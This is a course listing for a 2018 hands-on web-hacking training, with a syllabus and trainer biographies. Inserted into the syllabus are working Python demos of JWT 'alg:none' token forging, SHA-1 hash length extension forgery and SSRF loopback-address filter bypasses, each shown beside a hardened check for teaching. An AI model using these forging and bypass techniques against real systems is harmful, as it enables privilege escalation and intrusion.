Xtreme Web Hacking
Riyaz Walikar & Bharath Kumar, Appsecco
Trainer Name: Riyaz Walikar & Bharath Kumar, Appsecco
Title: Xtreme Web Hacking
Duration: 3 Days
Dates: 20th - 22nd June 2018
What to expect?
- Completely hands-on, intense, fast-paced learning using a combination of scenarios, case studies and hacker tools.
- Attacking applications using specialized tools and custom scripts that you will be writing over the three days.
- Coverage of vulnerabilities across platforms like Java, PHP, .NET, Python, Rails and more
- A custom CTF to end the three days of training
- Complete documentation of the attacks and virtual machines with multiple networks
Skill and knowledge required (Pre-requisites)
- You should be a web application penetration tester. Although we will cover some basics on Day 1, this should not be considered a beginner level course
- Familiarity with the command line on Windows and Linux
- Familiarity with the OWASP Top 10 2013 and OWASP Top 10 2017
What you will need to bring?
- A laptop with administrator privileges
- 10 GB of free Hard Disk Space
- Ideally 8 GB of RAM but minimum 4 GB
- Laptop should have a working wireless and wired/Ethernet connection
- Laptop should support hardware-based virtualization
- If your laptop can run a virtual machine in Oracle VirtualBox it should work
- Other virtualization software might work but we will not be able to provide support for that.
What not to expect?
- A lot of hand-holding on the basic concepts listed under the prerequisites
- A lot of theory. This is meant to be a completely hands-on training!!
- To become an accomplished hacker in a day
What you will get?
- Tools, virtual machines and software provided for the training
- Completely documented script and programs
- A simple to follow step by step walk through of the entire training in a PDF file
- Virtual machines with code used during the training so that you can even practice after the training is over
This 3-day hands-on training will cover the tools and techniques that an attacker can use to detect, identify and exploit web application security weaknesses to eventually gain access to user data or the underlying operating system itself.
Basics of the Hypertext Transfer Protocol (HTTP)
- Understanding the HTTP protocol and getting familiar with requests, responses, headers and parameters
Setting Up Interception Proxy
- Setting up Interception Proxy to work with requests and responses and automating attacks using proxy features
OWASP Top 10 2017
- Hands-on with the latest OWASP Top 10, except A10 (Insufficient Logging & Monitoring)
Domain reconnaissance and OSINT
- Gathering information about domains and sub-domains. Using tools to discover potentially vulnerable sub domains
Advanced database injection attacks
- Advanced injection attacks, including automating data exfiltration using second-order SQL injection
Injection and exploitation with NoSQL databases
- Application attacks and data exfiltration in NoSQL databases like MongoDB
Insecure Direct Object References
- Using Path traversal and file inclusion vulnerabilities to read interesting files and execute shell commands on the server
- Attacking weakly implemented serialization/deserialization functions to take control of web applications and the underlying server
XSS for the modern pentester
- Bypassing client- and server-side filters to steal CSRF tokens and hijack sessions
Attacking SOP and CORS
- Multiple topics under this section let candidates visualise where attacks originate for different kinds of XSS. Breaking and bypassing regular-expression-based filters is also covered, allowing candidates to execute XSS vectors using CORS
Attacking file upload functionality
- Bypassing well-defined file upload functionality using nuances in how files are treated on the server
Attacks on Authentication schemes
- Multiple attacks on SAML, OAuth and JWT will be covered to demonstrate common security misconfigurations
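One of the JWT misconfigurations this kind of session covers is a verifier that lets the token choose its own algorithm, so an attacker can strip the signature with `alg: none`. The following Python is an added example, not course material or Appsecco code: `SERVER_KEY` and the claims are constructed for the demo, and the weak and pinned verifiers are illustrative, not any particular library's API.

```python
import base64
import hashlib
import hmac
import json


def b64url_encode(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def _segment(obj: dict) -> str:
    return b64url_encode(json.dumps(obj, separators=(",", ":")).encode())


def make_jwt(claims: dict, key: bytes, alg: str = "HS256") -> str:
    """Build a JWT. alg='none' yields an unsigned token whose signature part is empty."""
    signing_input = _segment({"alg": alg, "typ": "JWT"}) + "." + _segment(claims)
    sig = b"" if alg == "none" else hmac.new(key, signing_input.encode(), hashlib.sha256).digest()
    return signing_input + "." + b64url_encode(sig)


def verify_trusting_header(token: str, key: bytes):
    """Misconfigured verifier: honours whatever 'alg' the token declares."""
    h, p, s = token.split(".")
    alg = json.loads(b64url_decode(h)).get("alg")
    if alg == "none":
        return json.loads(b64url_decode(p))  # accepted with no signature check at all
    if alg == "HS256":
        expected = hmac.new(key, f"{h}.{p}".encode(), hashlib.sha256).digest()
        if hmac.compare_digest(expected, b64url_decode(s)):
            return json.loads(b64url_decode(p))
    return None


def verify_pinned(token: str, key: bytes):
    """Hardened verifier: the server fixes the algorithm; the token header cannot override it."""
    h, p, s = token.split(".")
    if json.loads(b64url_decode(h)).get("alg") != "HS256":
        return None
    expected = hmac.new(key, f"{h}.{p}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, b64url_decode(s)):
        return None
    return json.loads(b64url_decode(p))


def forge_alg_none(token: str, **changes) -> str:
    """Attacker side: take a captured token, edit the claims, drop the signature."""
    _, p, _ = token.split(".")
    claims = json.loads(b64url_decode(p))
    claims.update(changes)
    return make_jwt(claims, b"", alg="none")


SERVER_KEY = b"constructed-demo-key"  # constructed for the example; the attacker never sees it


def demo() -> dict:
    legit = make_jwt({"sub": "alice", "role": "user"}, SERVER_KEY)
    forged = forge_alg_none(legit, role="admin")
    return {
        "weak_accepts_forged": verify_trusting_header(forged, SERVER_KEY),
        "pinned_accepts_forged": verify_pinned(forged, SERVER_KEY),
        "pinned_accepts_legit": verify_pinned(legit, SERVER_KEY),
    }


if __name__ == "__main__":
    print(demo())
```

The weak verifier hands back the attacker's `role: admin` claims without ever touching the key; the pinned verifier rejects the same token because it refuses any algorithm other than the one the server configured.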
XML External Entity Attacks
- Attacking server-side controls to leak file information and exfiltrate data using XXE attacks
Attacking Server-Side Templating
- Abusing server-side templating to inject code that allows for data leaks on the server and server-side code execution
Attacking common crypto implementations in web applications
- Multiple attacks around padding oracles and hash length extension will be covered to demonstrate weaknesses arising from the use of insecure options
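The hash length extension attack referred to above works against any MAC built as H(secret || message) with a Merkle-Damgard hash: the attacker resumes the hash from the published digest. The Python below is an added example, not course material or Appsecco code; it carries its own SHA-1 so the internal state can be set, and the `SECRET`, message and `&role=admin` suffix are constructed for the demo.

```python
import hashlib
import hmac
import struct

MASK = 0xFFFFFFFF


def _rotl(x: int, n: int) -> int:
    return ((x << n) | (x >> (32 - n))) & MASK


def sha1_padding(msg_len: int) -> bytes:
    """Bytes SHA-1 appends to a msg_len-byte message: 0x80, zeros to 56 mod 64, 64-bit bit length."""
    return b"\x80" + b"\x00" * ((55 - msg_len) % 64) + struct.pack(">Q", msg_len * 8)


def sha1(data: bytes, state=None, prior_len: int = 0) -> bytes:
    """Pure-Python SHA-1. `state` resumes from a known digest; `prior_len` is the
    number of bytes (a multiple of 64) already absorbed into that state."""
    h = list(state) if state else [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476, 0xC3D2E1F0]
    padded = data + sha1_padding(prior_len + len(data))
    for off in range(0, len(padded), 64):
        w = list(struct.unpack(">16I", padded[off:off + 64]))
        for i in range(16, 80):
            w.append(_rotl(w[i - 3] ^ w[i - 8] ^ w[i - 14] ^ w[i - 16], 1))
        a, b, c, d, e = h
        for i in range(80):
            if i < 20:
                f, k = (b & c) | (~b & d), 0x5A827999
            elif i < 40:
                f, k = b ^ c ^ d, 0x6ED9EBA1
            elif i < 60:
                f, k = (b & c) | (b & d) | (c & d), 0x8F1BBCDC
            else:
                f, k = b ^ c ^ d, 0xCA62C1D6
            a, b, c, d, e = (_rotl(a, 5) + f + e + k + w[i]) & MASK, a, _rotl(b, 30), c, d
        h = [(x + y) & MASK for x, y in zip(h, (a, b, c, d, e))]
    return struct.pack(">5I", *h)


def matches_hashlib(data: bytes = b"The quick brown fox jumps over the lazy dog") -> bool:
    """Sanity check of the hand-rolled SHA-1 against the standard library."""
    return sha1(data) == hashlib.sha1(data).digest()


def length_extend(known_digest: bytes, known_len: int, suffix: bytes):
    """Attacker: from H(secret||msg) and len(secret||msg), compute
    (glue + suffix, H(secret||msg||glue||suffix)) without knowing the secret."""
    glue = sha1_padding(known_len)            # the padding the server's hash already consumed
    resumed_len = known_len + len(glue)       # a multiple of 64: the state is block-aligned here
    forged = sha1(suffix, state=struct.unpack(">5I", known_digest), prior_len=resumed_len)
    return glue + suffix, forged


SECRET = b"constructed-secret"  # constructed for the example; the attacker never sees it


def weak_tag(msg: bytes) -> bytes:
    return sha1(SECRET + msg)                       # H(secret || msg): extendable


def strong_tag(msg: bytes) -> bytes:
    return hmac.new(SECRET, msg, hashlib.sha1).digest()  # HMAC: not extendable


def demo() -> dict:
    msg = b"user=alice&role=user"
    tag = weak_tag(msg)
    # The attacker knows msg and tag and guesses len(SECRET); in practice the guess is iterated.
    appended, forged = length_extend(tag, len(SECRET) + len(msg), b"&role=admin")
    return {
        "forged_message": msg + appended,
        "weak_accepts": hmac.compare_digest(weak_tag(msg + appended), forged),
        "hmac_accepts": hmac.compare_digest(strong_tag(msg + appended), forged),
    }


if __name__ == "__main__":
    print(demo())
```

The forged message carries the original padding bytes as glue, so a parser that takes the last occurrence of `role=` sees `admin`; the same attack against the HMAC-based tag fails because HMAC does not expose the inner hash state.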
Server-Side Request Forgery/Cross Site Port Attacks
- Using SSRF/XSPA to read internal files, gain access to interesting data and discover additional servers and applications
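A recurring step in SSRF/XSPA exploitation is getting past the target's host filter with alternative spellings of an internal address. The Python below is an added example, not course material or Appsecco code: `FAKE_DNS`, the hostnames in it and the URLs are constructed so the example runs offline, and `NAIVE_BLOCKLIST` stands in for the string-matching filters commonly met in the field. It shows a naive filter beside one that resolves the host to an IP first and decides on the address.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

# Constructed stand-in for DNS so the example runs offline; real code would call socket.getaddrinfo.
FAKE_DNS = {
    "localhost": "127.0.0.1",
    "metadata.internal": "169.254.169.254",
    "public.example": "1.2.3.4",
}

# String-matching denylist of the kind the bypasses below defeat.
NAIVE_BLOCKLIST = ("localhost", "127.0.0.1", "169.254.169.254", "10.", "172.16.", "192.168.")


def naive_allows(url: str) -> bool:
    """Passes 127.1, 2130706433 and [::1] even though all of them reach the loopback interface."""
    host = urlsplit(url).hostname or ""
    return not host.startswith(NAIVE_BLOCKLIST)


def _host_to_ip(host: str, resolver):
    try:
        return ipaddress.ip_address(host)                     # dotted-quad or IPv6 literal
    except ValueError:
        pass
    try:
        return ipaddress.IPv4Address(socket.inet_aton(host))  # shorthand forms: 127.1, 2130706433, 0177.0.0.1
    except OSError:
        pass
    return ipaddress.ip_address(resolver(host))               # a hostname: resolve it first


def resolve_if_allowed(url: str, resolver=FAKE_DNS.__getitem__):
    """Return the IP the fetcher should connect to, or None if the target is off limits.
    Connect to the returned IP rather than the hostname, otherwise a DNS rebind between
    this check and the request can swap the answer for an internal address."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https") or not parts.hostname:
        return None
    try:
        ip = _host_to_ip(parts.hostname, resolver)
    except (ValueError, KeyError, OSError):
        return None
    if ip.is_global and not ip.is_multicast:   # rejects loopback, link-local, RFC 1918, unspecified
        return str(ip)
    return None


if __name__ == "__main__":
    for url in ("http://127.1/", "http://2130706433/", "http://[::1]/", "http://metadata.internal/latest/", "http://public.example/"):
        print(url, naive_allows(url), resolve_if_allowed(url))
```

The naive filter lets every loopback spelling through; the address-based check rejects them all and additionally refuses non-HTTP schemes, which closes the `file://` and `gopher://` variants of the same attack.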
Gaining shell access to execute server-side system commands
- Creating web-shells on the server as footholds and setting up stable bash shells to provide a channel to transfer data and execute commands on the server
Pivoting to Internal networks
- Setting up access to internal networks using tools and techniques that would allow access to servers and applications not visible from the Internet
Capture the Flag style assessment
- A post-training assessment to gauge how much the candidates have grasped and to identify potential areas for improvement. Candidates apply everything they have learnt over the three days to solve the tasks at hand
Profile of Riyaz Walikar
Chief Offensive Security Officer, Appsecco
Riyaz Walikar is an OSCP-certified web application pentester, security evangelist and researcher. He has been active in the security community for the better part of the last 10 years. He has been actively involved with the Bangalore OWASP and null chapters for the last 7 years and is one of the OWASP and null Bangalore chapter leads.
He is actively involved in vulnerability research in popular web applications and network-aware services and has disclosed several security issues in popular software such as Apache Archiva, Openfire, Joomla! and ejabberd, as well as a .NET script injection bypass. He has found vulnerabilities in popular web applications run by Facebook, Twitter, Google, Cisco, Symantec, Mozilla, PayPal, eBay, Apigee, Yahoo, Adobe, Tumblr, Pinterest and others, and is on the Hall of Fame for most of these services. He has also been a speaker and trainer at several security conferences including OWASP AppSecUSA 2012, BlackHat Abu Dhabi 2012, Las Vegas 2015, EU 2015, nullcon 2012, 2013, 2014, 2015, 2016 and 2017, DefCon Las Vegas 2016 and c0c0n 2011, 2013, 2015 and 2016.
His technical interests lie with programming, bug bounty, malware analysis, breaking web applications, playing CTFs, researching devices that fall under the Internet of Things category and penetration testing networks exposed to the Internet. When he is not writing/breaking code, you can find him dabbling in photography, stargazing, playing football, reading or fishing.
Some of the trainings/workshops by Riyaz Walikar include
- Web Security Testing 101 at Govt. Dept., Bangalore 2017
- Secure Web Programming 2-day training at HackerRank Bangalore 2017
- Xtreme Web Hacking at NULLCON Goa 2012, 2013, 2014, 2015, 2016
- Cloud Security for Devs & Ops – NULLCON 2017
- Ninja Level Infrastructure Monitoring – DefCon 2016
- Xtreme Web Hacking (CTF Style) – c0c0n 2015, 2016, 2017
Some of the talks given by Riyaz Walikar include
- A Pentester's Methodology to Discover and Exploit Windows Privilege Escalation flaws – c0c0n 2015, nullcon 2016
- Esoteric XSS Payloads – c0c0n 2016
- The Whys and Hows of Cyber Attacks – SAP Security Summit, Bangalore 2016
- Pentesting an ELK Stack – DevOpsDays India, Bangalore 2016
- Poking Servers with Facebook – AppsecUSA 2012, BlackHat Abu Dhabi 2012, c0c0n 2013
- Threats with Online Gaming – c0c0n 2017
- LinkedIn: linkedin.com/in/riyazw
- Twitter: @riyazwalikar and @wincmdfu
Profile of Bharath Kumar
Security Engineer, Appsecco
Bharath is a Security Engineer at Appsecco. He is an Offensive Security Certified Professional (OSCP).
Bharath is an open source evangelist with a strong passion for information security and building solutions that solve real world problems.
He has strong experience in client facing consulting assessments and building implementable automation tools to solve the security needs for companies and organisations in sectors ranging from financial services to healthcare.
Bharath is an active member and contributor at various security and developer communities including null open security community and Python Malaysia User Group.
Bharath has presented at many security and developer conferences including Bsides Delhi, Bugcrowd LevelUp, PyCon India and FUDCon.
His technical interest lies in application security, infrastructure security, OSINT, protocol security and programming. When not fiddling with technology he enjoys volunteering, hiking, stargazing or reading books.
Some of the talks given by Bharath include
- “Doing recon like it’s 2017!” - Bsides Delhi 2017
- “Esoteric sub-domain enumeration” - Bugcrowd LevelUp 2017
- “Python for Penetration Testers” - PyCon India 2013
- LinkedIn: linkedin.com/in/yamakira/
- Twitter: @yamakira_